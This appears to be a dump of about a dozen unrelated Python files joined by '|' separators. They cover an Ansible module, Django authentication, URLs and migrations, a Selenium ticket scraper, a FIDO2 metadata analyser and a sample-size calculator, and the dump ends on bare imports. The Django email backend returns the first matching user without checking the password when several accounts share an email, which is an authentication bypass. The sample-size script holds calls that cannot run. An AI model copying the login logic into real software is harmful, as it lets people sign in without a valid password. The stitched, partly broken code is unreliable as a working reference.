import traceback
from ansible.module_utils.basic import AnsibleModule
def execute_module(module: AnsibleModule):
goodbye_target = module.params['goodbye_target']
full_goodbye = "Goodbye {0}!".format(goodbye_target)
module.exit_json(changed=True, full_goodbye=full_goodbye)
def main():
argument_spec = dict(
goodbye_target=dict(type="str", default="world"),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
execute_module(module)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 11 01:28:18 2019
@author: Byen23
"""
# 7th Program to be uploaded to github
"""Using Variables and Assign Statements"""
'''Write a script that will use distance in kilometers and time in hours to calculate and print out speed in kilometers per hour, miles per hour, and meters per second.'''
'''The formula for calculating speed is distance/time = speed.
To convert kilometers to miles, divide the kilometers by 1.6.
To convert kilometers to meters, multiply the kilometers by 1,000.
To convert hours to seconds, multiply hours by 3,600.'''
distance_in_km = 150
time_in_hours = 2
distance_in_mi = distance_in_km / 1.6
distance_in_mtrs = distance_in_km * 1000
time_in_seconds = time_in_hours * 3600
speed_in_kph = distance_in_km / time_in_hours
speed_in_mph = distance_in_mi / time_in_hours
speed_in_mps = distance_in_mtrs / time_in_seconds
print("The speed in kilometers per hour is:", speed_in_kph)
print("The speed in miles per hour is:", speed_in_mph)
print("The speed in meters per second is:", speed_in_mps)
|
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
# UserModel = get_user_model
# class EmailBackend(ModelBackend):
# def authenticate(self, request, username = None, password = None, **kwargs):
# try:
# user = UserModel.objects.get(
# Q(username__iexact = username) | Q(email__iexact = username)
# )
# except ObjectDoesNotExist:
# UserModel().set_password(password)
# except MultipleObjectsReturned:
# return User.objects.filter(email=username).order_by('id').first()
# else:
# if user.check_password(password) and self.user_can_authenticate(user):
# return user
# def get_user(self, user_id):
# try:
# user = UserModel.objects.get(pk = user_id)
# except ObjectDoesNotExist:
# return None
# return user if self.user_can_authenticate(user) else None
class EmailBackend(ModelBackend):
def authenticate(self, request, username=None, password=None, **kwargs):
UserModel = get_user_model()
try:
# user = UserModel.objects.get(Q(username__iexact=username) | Q(email__iexact=username)) # (email=username))
if ('@gmail.com') in username.lower():
if username.count('@') > 1:
index_of_separator = username.rfind('@')
email_local, email_domain = username[:index_of_separator], username[index_of_separator + 1:]
else: # if email.count('@') == 1:
email_local, email_domain = username.split('@')
user = UserModel.objects.get(Q(email__iexact=email_local+'@googlemail.com') | Q(email__iexact=email_local+'@gmail.com'))
elif ('@googlemail.com') in username.lower():
if username.count('@') > 1:
index_of_separator = username.rfind('@')
email_local, email_domain = username[:index_of_separator], username[index_of_separator + 1:]
else: # if email.count.count('@') == 1:
email_local, email_domain = username.split('@')
user = UserModel.objects.get(Q(email__iexact=email_local+'@gmail.com') | Q(email__iexact=email_local+'@googlemail.com'))
else:
user = UserModel.objects.get(Q(username__iexact=username) | Q(email__iexact=username))
except UserModel.DoesNotExist:
return None
# UserModel().set_password(password)
except UserModel.MultipleObjectsReturned:
return UserModel.objects.filter(email=username).order_by('id').first()
else:
if user.check_password(password):# and self.user_can_authenticate(user):
return user
return None
def get_user(self, user_id):
UserModel = get_user_model()
try:
user = UserModel.objects.get(pk = user_id)
except UserModel.DoesNotExist:
return None
return user if self.user_can_authenticate(user) else None |
from sources.source_gym import source_gym
import numpy as np
##### SOURCE GYM HOPPER
class source_gym_hopper( source_gym ):
### __INIT__
def __init__( self ):
source_gym.__init__( self , 'Hopper-v2' )
### INFORMATION
def num_actions( self ): return self.env.action_space.shape[0]
def range_actions( self ): return abs(self.env.action_space.high[0])
### MAP KEYS
def map_keys( self , actn ):
actn = np.clip( actn, self.env.action_space.low[0], self.env.action_space.high[0])
return np.expand_dims(actn,0)
### PROCESS OBSERVATION
def process( self , obsv ):
return obsv
|
from django.urls import include, path
from . import views
urlpatterns = [
path('', views.ListUsuario.as_view()),
path('<int:pk>/', views.DetailUsuario.as_view()),
path('rest-auth/', include('rest_auth.urls')),
path('signin',views.signin)
#path('rest-auth/', include('django_expiring_token.urls')),
] |
# Generated by Django 2.2.13 on 2020-09-27 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0003_OrderBundles'),
]
operations = [
migrations.CreateModel(
name='PromoCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('modified', models.DateTimeField(blank=True, db_index=True, null=True)),
('name', models.CharField(db_index=True, max_length=32, unique=True, verbose_name='Promo Code')),
('discount_percent', models.IntegerField(verbose_name='Discount percent')),
('active', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Promo Code',
'verbose_name_plural': 'Promo Codes',
},
),
]
|
from selenium import webdriver
from bs4 import BeautifulSoup
from pymongo import MongoClient
import re
#database setting
client = MongoClient('localhost',27017)
db = client.dbsparta
melon_ticket = db.melon_ticket.find() #creating collection named melon_ticket
#find artist
artist_number=698776 #yerin baek's artist number
artist_id=str(artist_number)
melon_ticket_url="https://ticket.melon.com/artist/index.htm?artistId="+artist_id
#setup driver|chrome
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver = webdriver.Chrome(r"C:\Users\pc\Desktop\chromedriver", chrome_options=options)
driver.implicitly_wait(3) # waiting web source for three seconds implicitly
# get melon url
driver.get(melon_ticket_url)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
#parsing information
all_text_notices = soup.find_all('div',{'class':{'show_infor'}})
urls_and_titles = soup.find_all('span',{'class':{'show_title'}})
dates = soup.find_all('td',{'class':{'show_date'}})
#print(dates)
def remove_tag(content):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', content)
return cleantext
for date in dates:
space_date=remove_tag(str(date))
raw_date=space_date.replace(" ", "")
date=raw_date[:22]
print(date)
#{title:url} database for tickets
b =[]
for i in urls_and_titles:
links = i.find_all('a')
for link in links:
url='https://ticket.melon.com/'+link['href']
b.append({i.text:url})
db.melon_ticket.insert_one({'title':i.text,'url':url})
#print list of the ticket database
#print (b)
'''
#all text notices including status of ticket selling
for n in all_text_notices:
print(n.text.strip())
#titles
for i in urls_and_titles:
print(i.text.strip())
'''
|
"""
Test 'conditioner.models' file
"""
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.test import TestCase
from conditioner.models import Rule
from conditioner.tests.factories import RuleFactory, BaseActionFactory, BaseConditionFactory
from conditioner.utils import TimeStampedModelMixin
class RuleTestCase(TestCase):
"""
Test `conditioner.Rule` model
"""
def setUp(self):
super().setUp()
self.model = Rule
self.instance = RuleFactory()
# Link sample action and condition to rule
BaseActionFactory(rule=self.instance)
BaseConditionFactory(rule=self.instance)
def test_model_inheritance(self):
"""Test model inheritance"""
self.assertIsInstance(self.instance, models.Model)
self.assertIsInstance(self.instance, TimeStampedModelMixin)
def test_model_target_content_type_field(self):
"""Test model 'target_content_type' field"""
field = self.model._meta.get_field('target_content_type')
self.assertIsInstance(field, models.ForeignKey)
self.assertEqual(field.rel.model, ContentType)
self.assertEqual(field.rel.related_name, 'rules')
self.assertEqual(field.verbose_name, 'target content type')
self.assertTrue(field.null)
self.assertTrue(field.blank)
def test_model_meta_attributes(self):
"""Test model meta attributes"""
meta = self.model._meta
self.assertEqual(meta.verbose_name, 'rule')
self.assertEqual(meta.verbose_name_plural, 'rules')
def test_model_target_model_property(self):
"""Test model `target_model()` property"""
self.assertEqual(
self.instance.target_model,
self.instance.target_content_type.model_class()
)
def test_model_str_method(self):
"""Test model `__str__` method"""
self.assertIn(str(self.instance.action), str(self.instance))
self.assertIn(str(self.instance.condition), str(self.instance))
self.assertIn(str(self.instance.target_model), str(self.instance))
|
# Generated by Django 3.2.3 on 2021-05-27 22:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('beershareapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='BeerOrder',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.PositiveIntegerField()),
('status', models.PositiveSmallIntegerField(choices=[(1, 'Placed'), (2, 'Accepted'), (3, 'Declined'), (4, 'Done')])),
('beerCellarEntry', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='beershareapp.beercellarentry')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='BeerOder',
),
]
|
import os, sys, logging, copy
import signal
import json
import binascii, base64
import argparse
import requests, jwt
from colorama import Fore, Back, Style
from cryptography import x509
from cryptography.hazmat.backends import default_backend
import res.const as const
def read_jwt(url, token):
#
# Call repository for one device
#
curl_url = url + "?token=" + token
try:
logging.info("Device | Calling for device information : " + Fore.LIGHTWHITE_EX + "{}".format(curl_url))
u = requests.get(curl_url, allow_redirects=True)
status_code = u.status_code
reason = u.reason
content = u.content
logging.info("Device | Device Status code : " + Fore.LIGHTWHITE_EX + "{} ({})".format(status_code, reason))
logging.info("Device | Device Content lenght (encoded) : {} bytes".format(len(content)))
if (status_code == 200):
# Got an answer, no problem
return content
elif (status_code == 302):
# Redirection, probably the token is not valid anymore
logging.warning("The FIDO2 site responded, but the token may be invalid. No data retrieved.")
else:
logging.error("Something went wrong with the FIDO2 site. No data retrieved.")
except requests.exceptions.ConnectionError as err:
logging.error("Something very bad happened with the API call. " + str(err))
def analyze_device(data):
#
# Decoding JWT Header. Just base64. No payload here.
#
base64_bytes = base64.b64decode(data, '-_') # Some infos are strangely encoded...
device = json.loads(base64_bytes)
readable_device = {}
#
# Displaying information
#
# Reference : https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#idl-def-MetadataStatement
#
# Values are defined in a FIDO registry : https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-registry-v2.0-rd-20180702.html
#
# Key: aaid
# ---
# See https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html#authenticator-attestation-id-aaid-typedef
#
# Authenticator Attestation ID. This field MUST be set if the authenticator implements FIDO UAF.
# The AAID is a string with format "V#M", where
# "#" is a separator
# "V" indicates the authenticator Vendor Code. This code consists of 4 hexadecimal digits.
# "M" indicates the authenticator Model Code. This code consists of 4 hexadecimal digits.
#
device_key = 'aaid'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: aaguid
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-aaguid
# https://fidoalliance.org/specs/fido-v2.0-ps-20150904/fido-key-attestation-v2.0-ps-20150904.html#aaguid-extension
#
# The Authenticator Attestation GUID. This field must be set if the authenticator implements FIDO 2.
#
device_key = 'aaguid'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# key: description
# ---
# Human-readable, short description of the authenticator, in English)
#
device_key = 'description'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# key: alternativeDescriptions
# ---
# A list of human-readable short descriptions of the authenticator in different languages.
#
device_key = 'alternativeDescriptions'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: isSecondFactorOnly
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-isSecondFactorOnly
#
# Indicates if the authenticator is designed to be used only as a second factor, i.e. requiring some other authentication method as a first factor (e.g. username+password).
#
device_key = 'isSecondFactorOnly'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: operatingEnv
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-operatingEnv
# https://fidoalliance.org/specs/fido-security-requirements-v1.1-fd-20171108/fido-authenticator-allowed-restricted-operating-environments-list-v1.1-fd-20171108.html
#
# Description of the particular operating environment that is used for the Authenticator.
#
device_key = 'operatingEnv'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: verificationMethodDescriptor
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#verificationmethoddescriptor-dictionary
#
# A descriptor for a specific base user verification method as implemented by the authenticator. Should be an integer.
#
device_key = 'verificationMethodDescriptor'
if (device_key in device):
info = const.UserVerificationMethod(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: supportedExtensions
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-supportedExtensions
#
# List of extensions supported by the authenticator.
#
device_key = 'supportedExtensions'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: matcherProtection
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-matcherProtection
# https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-registry-v2.0-rd-20180702.html#matcher-protection-types
#
# A 16-bit number representing the bit fields defined by the MATCHER_PROTECTION constants in the FIDO Registry of Predefined Values
#
device_key = 'matcherProtection'
if (device_key in device):
info = const.MatcherProtection(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: protocolFamily
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-protocolFamily
#
# The FIDO protocol family. The values "uaf", "u2f", and "fido2" are supported. If this field is missing, the assumed protocol family is "uaf". Metadata Statements for
# U2F authenticators must set the value of protocolFamily to "u2f" and FIDO 2.0/WebAuthentication Authenticator implementations must set the value of protocolFamily to "fido2".
#
device_key = 'protocolFamily'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: upv
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-upv
#
# The FIDO unified protocol version(s) (related to the specific protocol family) supported by this authenticator. See [UAFProtocol] for the definition of the Version structure.
#
device_key = 'upv'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: isKeyRestricted
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-isKeyRestricted
#
# This entry is set to true, if the Uauth private key is restricted by the authenticator to only sign valid FIDO signature assertions.
# This entry is set to false, if the authenticator doesn't restrict the Uauth key to only sign valid FIDO signature assertions. In this case, the calling application
# could potentially get any hash value signed by the authenticator.
#
# If this field is missing, the assumed value is isKeyRestricted=true
#
device_key = 'isKeyRestricted'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: keyProtection
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-keyProtection
#
# A 16-bit number representing the bit fields defined by the KEY_PROTECTION constants in the FIDO Registry of Predefined Values. This value must be non-zero.
#
device_key = 'keyProtection'
if (device_key in device):
info = const.KeyProtection(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: cryptoStrength
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-cryptoStrength
#
# The authenticator's overall claimed cryptographic strength in bits (sometimes also called security strength or security level). This is the minimum
# of the cryptographic strength of all involved cryptographic methods (e.g. RNG, underlying hash, key wrapping algorithm, signing algorithm, attestation
# algorithm), e.g. see [FIPS180-4], [FIPS186-4], [FIPS198-1], [SP800-38B], [SP800-38C], [SP800-38D], [SP800-38F], [SP800-90C], [SP800-90ar1], [FIPS140-2] etc.
#
device_key = 'cryptoStrength'
if (device_key in device):
logging.info(const.str_format_green.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: authenticationAlgorithm
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-authenticationAlgorithm
#
# The preferred authentication algorithm supported by the authenticator. This value must be non-zero.
#
device_key = 'authenticationAlgorithm'
if (device_key in device):
info = const.AuthenticationAlgorithms(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: authenticationAlgorithms
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-authenticationAlgorithms
#
# The list of authentication algorithms supported by the authenticator. Must be set to the complete list of the supported ALG_ constants defined in the FIDO
# Registry of Predefined Values if the authenticator supports multiple algorithms. Each value must be non-zero.
#
device_key = 'authenticationAlgorithms'
if (device_key in device):
info = const.AuthenticationAlgorithms(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: publicKeyAlgAndEncoding
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-publicKeyAlgAndEncodings
#
# The list of public key formats supported by the authenticator during registration operations.
#
device_key = 'publicKeyAlgAndEncoding'
if (device_key in device):
info = const.AuthenticationAlgorithms(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: isFreshUserVerificationRequired
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-isFreshUserVerificationRequired
#
# If true, user verification is required. Else, it is the responsibility of the App to ask for user consent. If this field is missing, the assumed value is true.
#
device_key = 'isFreshUserVerificationRequired'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: tcDisplay (transaction confirmation display)
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-tcDisplay
#
# A 16-bit number representing a combination of the bit flags defined by the TRANSACTION_CONFIRMATION_DISPLAY constants in the FIDO Registry of Predefined Values [FIDORegistry].
# This value must be 0, if transaction confirmation is not supported by the authenticator.
#
device_key = 'tcDisplay'
if (device_key in device):
info = const.tc_display(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: tcDisplayContentType
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-tcDisplayContentType
#
# Supported MIME content type [RFC2049] for the transaction confirmation display, such as text/plain or image/png.
# This value must be present if transaction confirmation is supported, i.e. tcDisplay is non-zero.
#
device_key = 'tcDisplayContentType'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: tcDisplayPNGCharacteristics
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-tcDisplayPNGCharacteristics
#
# A list of alternative DisplayPNGCharacteristicsDescriptor.
#
device_key = 'tcDisplayPNGCharacteristics'
if (device_key in device):
logging.debug(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: userVerificationDetails
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-userVerificationDetails
# https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-registry-v2.0-rd-20180702.html#user-verification-methods
#
# A LIST of alternative VerificationMethodANDCombinations. Each of these entries is one alternative user verification method. Each of these alternative user verification
# methods might itself be an "AND" combination of multiple modalities.
# All effectively available alternative user verification methods must be properly specified here. A user verification method is considered effectively available if this
# method can be used to either:
# - enroll new verification reference data to one of the user verification methods
# - unlock the UAuth key directly after successful user verification
#
device_key = 'userVerificationDetails'
if (device_key in device):
readable_device[device_key] = []
user_verifications = device.get(device_key)
# We have an array of possibilities
for combination in user_verifications:
# Each element is one user verification method
verif_method = []
# Each verification method can have multiple verification modalities (fingerprint, fingerprint+password, etc)
for modality in combination:
readable_modality = {}
if ('userVerification' in modality):
info = const.UserVerificationMethod(modality.get('userVerification'))
readable_modality['userVerification'] = str(info)
# Each modality can have one 'userVerification' and optional fields
for field in modality.keys():
if ('userVerification' != field):
readable_modality[field] = modality.get(field)
verif_method.append(copy.deepcopy(readable_modality))
logging.info(const.str_format.format("Device", device_key, readable_modality))
readable_device[device_key].append(copy.deepcopy(verif_method))
# Key: assertionScheme
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-assertionScheme
#
# A list of alternative VerificationMethodANDCombinations. Each of these entries is one alternative user verification method. Each of these alternative user verification methods
# might itself be an "AND" combination of multiple modalities.
# All effectively available alternative user verification methods must be properly specified here. A user verification method is considered effectively available if this method
# can be used to either:
# - enroll new verification reference data to one of the user verification methods
# - unlock the UAuth key directly after successful user verification
#
device_key = 'assertionScheme'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: attachmentHint
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-attachmentHint
#
# A 32-bit number representing the bit fields defined by the ATTACHMENT_HINT constants in the FIDO Registry of Predefined Values. The ATTACHMENT_HINT constants are flags
# in a bit field represented as a 32 bit long. They describe the method an authenticator uses to communicate with the FIDO User Device. These constants are reported and
# queried through the UAF Discovery APIs [UAFAppAPIAndTransport], and used to form Authenticator policies in UAF protocol messages. Because the connection state and topology
# of an authenticator may be transient, these values are only hints that can be used by server-supplied policy to guide the user experience, e.g. to prefer a device that is
# connected and ready for authenticating or confirming a low-value transaction, rather than one that is more secure but requires more user effort.
#
device_key = 'attachmentHint'
if (device_key in device):
info = const.AuthenticatorAttachmentHints(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: attestationRootCertificates
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-attestationRootCertificates
#
# Each element of this array represents a X.509 certificate that is a valid trust anchor for this authenticator model. The array does not represent a certificate chain, but
# only the trust anchor of that chain.
#
device_key = 'attestationRootCertificates'
if (device_key in device):
const.display_cert_list(logging, "Device", "Cert.", device.get(device_key))
readable_device[device_key] = device.get(device_key)
# Key: attestationCertificateKeyIdentifiers
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-attestationCertificateKeyIdentifiers
#
# A list of the attestation certificate public key identifiers encoded as hex string.
#
device_key = 'attestationCertificateKeyIdentifiers'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: attestationTypes
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-attestationTypes
#
# The supported attestation type(s). (e.g. ATTESTATION_BASIC_FULL(0x3E07), ATTESTATION_BASIC_SURROGATE(0x3E08)).
#
device_key = 'attestationTypes'
if (device_key in device):
info = const.AuthenticatorAttestation(device.get(device_key))
logging.info(const.str_format.format("Device", device_key, info))
readable_device[device_key] = str(info)
# Key: authenticatorVersion
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-authenticatorVersion
#
# Earliest (i.e. lowest) trustworthy authenticatorVersion meeting the requirements specified in this metadata statement.
#
device_key = 'authenticatorVersion'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)))
readable_device[device_key] = device.get(device_key)
# Key: icon
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-icon
#
# RFC2397-encoded PNG icon for the Authenticator.
#
device_key = 'icon'
if (device_key in device):
icon_type = device.get(device_key).split(";")[0]
logging.info(const.str_format.format("Device", device_key, "found (" + icon_type + ")"))
else:
logging.info(const.str_format.format("Device", device_key, "not found"))
# Key: legalHeader
# ---
# See https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#widl-MetadataStatement-legalHeader
#
# The legalHeader, if present, contains a legal guide for accessing and using metadata, which itself may contain URL(s) pointing
# to further information, such as a full Terms and Conditions statement.
#
device_key = 'legalHeader'
if (device_key in device):
logging.info(const.str_format.format("Device", device_key, device.get(device_key)[:300] + "..."))
readable_device[device_key] = device.get(device_key)
return device, readable_device
#
# Hey guys, this is a module
#
if __name__ == "__main__":
print("Don't ever call me, stupid!")
sys.exit(1)
|
x = 100
def hello(a):
print a
|
"""
Purpose: Sample size
Date created: 2020-11-19
Ref:
https://www.qualtrics.com/experience-management/research/determine-sample-size/
https://github.com/shawnohare/samplesize/blob/master/samplesize.py
Contributor(s):
Mark M.
"""
try:
from secrets import SystemRandom
except ModuleNotFoundError:
from random import SystemRandom
from math import exp, inf, pi, sqrt, erf
from statistics import mean, stdev
rnd = SystemRandom()
# import numpy as np
# x = np.linspace(-4, 4, num = 100)
# def get_z_scr_attrs(a = 0.05, n_trials = 100, samples_per_trial = 1000):
# --- Calc. Probability Density Function (PDF) for standard normal distribution --- #
def linspace_(minval, maxval, n_steps = None, stepsize = None):
minval *= 1.
maxval *= 1.
if not n_steps is None:
n_steps -= 1
stepsize = float(maxval - minval) / float(n_steps)
elif not stepsize is None:
n = float(maxval - minval) / float(stepsize)
output = list()
while minval <= maxval:
output.append(minval)
minval += stepsize
return output
lsp = linspace_(-4, 4, maxval = 100)
lsp = linspace_(0., 3.5, stepsize=0.1)
def norm_probability_density(x):
# lhs_constant = 1. / sqrt(2 * pi)
def phi(x):
'Cumulative distribution function for the standard normal distribution'
return (1.0 + erf(x / sqrt(2.0))) / 2.0
value = 0.
for i in range(-inf, x):
value += phi()
idx_range = list(map(lambda x: round(x/10, 2), range(0, 36)))
col_range = list(map(lambda x: round(x/100, 2), range(0, 11)))
matrix = [[0.] * len(idx_range) for _ in range(len(col_range))]
for r in range(len(idx_range)):
for c in range(len(col_range)):
matrix[c][r] = round(idx_range[r] + col_range[c], 4)
constant = 1 / sqrt(2 * pi)
alpha = 0.05
conf_level = 1 - alpha
n_trials = 1000
epochs = 100
results = []
for n in range(epochs):
# rand_vals = [rnd.uniform(0, 1) for _ in range(n_trials)]
rand_vals = [rnd.random() for _ in range(n_trials)]
results.append(sum([1 if i <= conf_level else 0 for i in rand_vals]) / n_trials)
mean(results)
def cls_prop(name, datatype):
"""Class property helper function."""
mask_name = f"__{name}"
@property
def this_prop(self):
return getattr(self, mask_name)
@this_prop.setter
def this_prop(self, value):
if not isinstance(value, datatype):
raise TypeError(f"Expected data type {datatype}!")
setattr(self, mask_name, value)
return this_prop
class SampleSize:
cls_prop("population_size", str)
cls_prop("alpha", float)
cls_prop("margin_of_error", float)
def __init__(self, population_size, alpha=0.05, margin_of_error = 0.05):
self.population_size = population_size
self.alpha = alpha
self.ci = 1 - alpha
self.margin_of_error = margin_of_error
# Calculated
import scipy.stats as ss
def _get_conf_lvl(a):
return round(ss.norm.ppf(1 - (a/2)), 4)
def sampleSize(population_size, margin_error = .05, confidence_level = .99, sigma = 1/2):
"""
Calculate the minimal sample size to use to achieve a certain
margin of error and confidence level for a sample estimate
of the population mean.
Inputs
-------
population_size: integer
Total size of the population that the sample is to be drawn from.
margin_error: number
Maximum expected difference between the true population parameter,
such as the mean, and the sample estimate.
confidence_level: number in the interval (0, 1)
If we were to draw a large number of equal-size samples
from the population, the true population parameter
should lie within this percentage
of the intervals (sample_parameter - e, sample_parameter + e)
where e is the margin_error.
sigma: number
The standard deviation of the population. For the case
of estimating a parameter in the interval [0, 1], sigma=1/2
should be sufficient.
"""
alpha = 1 - (confidence_level)
zdict = {
.90: 1.645,
.91: 1.695,
.99: 2.576,
.97: 2.17,
.94: 1.881,
.93: 1.812,
.95: 1.96,
.98: 2.326,
.96: 2.054,
.92: 1.751
}
if confidence_level in zdict:
z = zdict[confidence_level]
else:
from scipy.stats import norm
z = norm.ppf(1 - (alpha/2))
z = _get_conf_lvl(alpha)
N = population_size
M = margin_error
numerator = z**2 * sigma**2 * (N / (N-1))
denom = M**2 + ((z**2 * sigma**2)/(N-1))
return numerator/denom
n = 768
moe = 0.05
alpha = 0.01
std = 0.5
z = _get_conf_lvl(alpha)
const = z**2 * std**2
numerator = const * (n / (n-1))
denom = (moe ** 2) + (const / (n-1))
samplesize = (numerator//denom)+1 |
import datetime
from collections import OrderedDict
from pathlib import Path
from typing import Mapping, Tuple
import dateutil.parser
import pytz
from synctogit.filename_sanitizer import denormalize_filename
